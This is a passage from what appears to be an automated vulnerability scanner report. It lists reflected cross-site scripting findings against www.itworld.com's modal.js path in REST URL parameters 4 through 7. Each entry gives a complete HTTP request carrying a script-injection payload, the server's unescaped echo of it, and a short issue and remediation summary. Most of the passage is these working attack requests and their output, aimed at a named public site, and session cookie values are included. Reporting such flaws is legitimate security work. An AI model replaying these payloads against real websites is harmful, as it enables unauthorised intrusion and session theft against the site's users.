Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:28:55 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460535"
Content-Type: text/html; charset=utf-8
Content-Length: 57630
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:28:57 GMT
X-Varnish: 1038166846
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modulesbc2a9"><script>alert(1)</script>f020999d5a4/contrib/ctools/js/modal.js?h"/>
...[SNIP]...

1.161. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ctools/js/modal.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b69b5"-alert(1)-"5794c269b7d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contribb69b5"-alert(1)-"5794c269b7d/ctools/js/modal.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:29:28 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460568"
Content-Type: text/html; charset=utf-8
Content-Length: 57409
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:29:36 GMT
X-Varnish: 1038168247
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
op14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contribb69b5"-alert(1)-"5794c269b7d/ctools/js/modal.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requested.
...[SNIP]...

1.162. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ctools/js/modal.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 200ea"><script>alert(1)</script>a88bc885a50 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contrib200ea"><script>alert(1)</script>a88bc885a50/ctools/js/modal.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:29:22 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460562"
Content-Type: text/html; charset=utf-8
Content-Length: 57629
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:29:23 GMT
X-Varnish: 1038167926
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contrib200ea"><script>alert(1)</script>a88bc885a50/ctools/js/modal.js?h"/>
...[SNIP]...

1.163. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ctools/js/modal.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70b57"><script>alert(1)</script>2cedf6ab25e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contrib/ctools70b57"><script>alert(1)</script>2cedf6ab25e/js/modal.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:29:42 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460582"
Content-Type: text/html; charset=utf-8
Content-Length: 57630
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:29:45 GMT
X-Varnish: 1038168693
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contrib/ctools70b57"><script>alert(1)</script>2cedf6ab25e/js/modal.js?h"/>
...[SNIP]...

1.164. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ctools/js/modal.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4fb3"-alert(1)-"ba992ebbd3f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib/ctoolsc4fb3"-alert(1)-"ba992ebbd3f/js/modal.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:29:49 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460589"
Content-Type: text/html; charset=utf-8
Content-Length: 57409
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:29:51 GMT
X-Varnish: 1038168765
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
gerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib/ctoolsc4fb3"-alert(1)-"ba992ebbd3f/js/modal.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requested.";
s.eV
...[SNIP]...

1.165. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ctools/js/modal.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2735"-alert(1)-"2f54e7368a9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib/ctools/jsf2735"-alert(1)-"2f54e7368a9/modal.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:30:03 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460603"
Content-Type: text/html; charset=utf-8
Content-Length: 57414
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:30:06 GMT
X-Varnish: 1038169091
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
ich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib/ctools/jsf2735"-alert(1)-"2f54e7368a9/modal.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requested.";
s.eVar1
...[SNIP]...

1.166. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ctools/js/modal.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 262b2"><script>alert(1)</script>d5d0e30c27c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contrib/ctools/js262b2"><script>alert(1)</script>d5d0e30c27c/modal.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:29:59 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460599"
Content-Type: text/html; charset=utf-8
Content-Length: 57634
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:29:59 GMT
X-Varnish: 1038168965
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contrib/ctools/js262b2"><script>alert(1)</script>d5d0e30c27c/modal.js?h"/>
...[SNIP]...

1.167. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ctools/js/modal.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb47f"-alert(1)-"e72c8dfa79e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib/ctools/js/modal.jseb47f"-alert(1)-"e72c8dfa79e?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:30:29 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460629"
Content-Type: text/html; charset=utf-8
Content-Length: 57409
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:30:30 GMT
X-Varnish: 1038170580
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
rop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib/ctools/js/modal.jseb47f"-alert(1)-"e72c8dfa79e";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requested.";
s.eVar13="CMS";

...[SNIP]...

1.168. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ctools/js/modal.js

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d8b1"><script>alert(1)</script>8806e851229 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contrib/ctools/js/modal.js9d8b1"><script>alert(1)</script>8806e851229?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:30:20 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460620"
Content-Type: text/html; charset=utf-8
Content-Length: 57628
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:30:21 GMT
X-Varnish: 1038169736
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
